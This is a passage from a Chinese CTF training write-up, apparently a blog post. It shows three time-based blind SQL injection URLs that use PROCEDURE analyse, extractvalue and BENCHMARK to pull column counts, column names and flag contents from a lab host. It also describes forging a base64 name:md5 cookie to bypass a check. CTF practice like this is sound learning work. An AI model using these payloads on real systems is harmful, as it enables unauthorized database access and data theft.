<p>然后是表的字段数<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://104.236.171.163/week2/limit/?l=1 PROCEDURE analyse((<span class="operator"><span class="keyword">select</span> extractvalue(<span class="keyword">rand</span>(),<span class="keyword">concat</span>(<span class="number">0x3a</span>,(<span class="keyword">IF</span>(<span class="keyword">ORD</span>(<span class="keyword">MID</span>((<span class="keyword">SELECT</span> <span class="keyword">DISTINCT</span>(<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(*) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)) <span class="keyword">FROM</span> INFORMATION_SCHEMA.<span class="keyword">COLUMNS</span> <span class="keyword">WHERE</span> TABLE_NAME=<span class="number">0x666C6167</span> <span class="keyword">AND</span> TABLE_SCHEMA = <span class="keyword">DATABASE</span>() <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) = <span class="number">99</span> , <span class="keyword">BENCHMARK</span>(<span class="number">5000000</span>,<span class="keyword">SHA1</span>(<span class="number">1</span>)),<span class="number">1</span>))))),<span class="number">1</span>);</span></span><br></pre></td></tr></table></figure></p>
<p>然后是爆表的字段名<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://104.236.171.163/week2/limit/?l=1 PROCEDURE analyse((<span class="operator"><span class="keyword">select</span> extractvalue(<span class="keyword">rand</span>(),<span class="keyword">concat</span>(<span class="number">0x3a</span>,(<span class="keyword">IF</span>(<span class="keyword">ORD</span>(<span class="keyword">MID</span>((<span class="keyword">SELECT</span> <span class="keyword">DISTINCT</span>(<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(COLUMN_NAME <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)) <span class="keyword">FROM</span> INFORMATION_SCHEMA.<span class="keyword">COLUMNS</span> <span class="keyword">WHERE</span> TABLE_NAME=<span class="number">0x666C6167</span> <span class="keyword">AND</span> TABLE_SCHEMA = <span class="keyword">DATABASE</span>() <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) = <span class="number">99</span> , <span class="keyword">BENCHMARK</span>(<span class="number">5000000</span>,<span class="keyword">SHA1</span>(<span class="number">1</span>)),<span class="number">1</span>))))),<span class="number">1</span>);</span></span><br></pre></td></tr></table></figure></p>
<p>最后就是爆表的内容<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://104.236.171.163/week2/limit/?l=1 PROCEDURE analyse((<span class="operator"><span class="keyword">select</span> extractvalue(<span class="keyword">rand</span>(),<span class="keyword">concat</span>(<span class="number">0x3a</span>,(<span class="keyword">IF</span>(<span class="keyword">ORD</span>(<span class="keyword">MID</span>((<span class="keyword">SELECT</span> <span class="keyword">DISTINCT</span>(<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(ctf_limit_flag <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)) <span class="keyword">FROM</span> flag <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) = <span class="number">99</span> , <span class="keyword">BENCHMARK</span>(<span class="number">5000000</span>,<span class="keyword">SHA1</span>(<span class="number">1</span>)),<span class="number">1</span>))))),<span class="number">1</span>);</span></span><br></pre></td></tr></table></figure></p>
<p>最后得到flag。</p>
<h3 id="Problem_ID:8">Problem ID:8</h3><h3 id="简单的题目">简单的题目</h3><p>根据题目描述, <code>GET ID = FLAG!</code>,尝试提交一个get表单,`ID=FLAG`,构造URL,得到flag。</p>
<h3 id="Problem_ID:9">Problem ID:9</h3><h3 id="基础训练">基础训练</h3><p>查看饼干,发现有个饼干是这样的<code>flag=bGlnaHRsZXNzOjQ3NmExMGYxZjNkZGU1MWQxYjUyMjY3YzFhY2NjMzll</code>应该是主要考加密解密的,base64解一下,得到<code>lightless:476a10f1f3dde51d1b52267c1accc39e</code>,应该是<code>名字:md5(名字)</code>的模式,根据首页的提示,<code>要用我名字的罗马音哦~</code>,逆向的进行一步一步加密,<code>Tobiichi Origami:097b235243b09755b3f586f201e8da8d</code>然后得到<code>VG9iaWljaGkgT3JpZ2FtaTowOTdiMjM1MjQzYjA5NzU1YjNmNTg2ZjIwMWU4ZGE4ZA==</code>,用这个换掉原来的饼干,done!</p>
<p>week2的题目后面两道,虽然有一点点小失误(有一题base64转码的过程中,把空格进行了URL编码,导致一直不对但是后来想到了就秒了),但基本上还算是秒掉的。但是第一题确实是比较困难的,做的过程中看了很多资料,也增加了自己的很多知识,弥补了很多的不足。挺好的。训练还是有用的。<br>期待week3!</p>